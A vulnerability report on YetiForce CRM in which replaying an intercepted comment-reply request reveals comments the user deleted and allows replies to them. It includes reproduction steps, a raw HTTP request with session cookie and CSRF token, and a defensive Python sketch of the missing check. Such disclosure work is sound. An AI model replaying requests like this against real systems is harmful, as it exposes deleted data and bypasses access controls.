User can get details of the comments that were deleted in yetiforcecompany/yetiforcecrm
Reported on
Sep 19th 2022
Description
When a user creates a new record, he can add a comment on it. The user is also able to delete the comments, after which the user won't have access to that comment, such as replying to it or checking what the comment was. This vulnerability allows any user to see what the deleted comment was and also to reply to that comment.
Proof of Concept
1. Log in to the application https://gitstable.yetiforce.com/index.php?module=Accounts&view=Detail&record=2029 .
2. Go to create records and create a new one.
3. Enter a new comment and click on save.
4. Reply to the comment created and intercept the request.
5. Send the request to the repeater.
6. Delete the comment that you created.
7. Send the request in the repeater and the details of the deleted comment are exposed.
```http
POST /index.php HTTP/1.1
Host: gitstable.yetiforce.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 153
Origin: https://gitstable.yetiforce.com
Connection: close
Cookie: YTSID=50trt9s5he1qontpsn2ktvdab9; _pk_id.10.6d7c=d037ceed70283778.1663586607.; _pk_ses.10.6d7c=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

_csrf=sid:3eb187103ad72d3dbb5c9c5cbe0d059c0111704b,1663590705&action=SaveAjax&commentcontent=test&related_to=2029&module=ModComments&parent_comments=2054
```
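The following Python is an added illustration, not YetiForce's own code: it models the server-side check a handler for the SaveAjax reply request above should make, namely that the parent referenced by parent_comments exists, is not deleted, belongs to the record given in related_to, and sits on a record the user may view. The Comment, CommentStore, reply_allowed and can_view names are assumptions made for the example; the in-memory store stands in for the ModComments table.

```python
from dataclasses import dataclass
from typing import Callable, Dict

@dataclass
class Comment:
    id: int
    related_to: int      # record the comment is attached to (2029 in the PoC request)
    author: str
    content: str
    parent_id: int = 0   # 0 marks a top-level comment
    deleted: bool = False

class ReplyRejected(Exception):
    """A SaveAjax-style reply that must not be saved."""

class CommentStore:
    def __init__(self) -> None:
        self._comments: Dict[int, Comment] = {}   # stand-in for the ModComments table
        self._next_id = 1

    def add(self, related_to: int, author: str, content: str, parent_id: int = 0) -> Comment:
        c = Comment(self._next_id, related_to, author, content, parent_id)
        self._comments[c.id] = c
        self._next_id += 1
        return c

    def delete(self, comment_id: int) -> None:
        # Soft delete: the row stays, but it must never be served or replied to again.
        self._comments[comment_id].deleted = True

    def save_reply(self, form: Dict[str, str], user: str,
                   can_view: Callable[[str, int], bool]) -> Comment:
        """Validate a reply using the same form fields the PoC request carries."""
        parent = self._comments.get(int(form["parent_comments"]))
        related_to = int(form["related_to"])
        # A deleted parent is treated exactly like a missing one, with one shared
        # message, so the endpoint neither echoes the old comment nor confirms it existed.
        if parent is None or parent.deleted or parent.related_to != related_to:
            raise ReplyRejected("parent comment not found")
        if not can_view(user, related_to):
            raise ReplyRejected("access denied")
        return self.add(related_to, user, form["commentcontent"], parent.id)

def reply_allowed(store, form, user, can_view) -> bool:
    # True if the reply was accepted and saved, False if it was rejected.
    try:
        store.save_reply(form, user, can_view)
        return True
    except ReplyRejected:
        return False
```

The same "parent comment not found" response for a missing and for a deleted parent matters: a reply endpoint that answers differently still tells a user that a comment they can no longer see once existed.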
Impact
The user can get details of all the comments that were deleted by other users.
Hi irfansayyed-github,
We can assign a CVE to this report at the request of the maintainer.
Thanks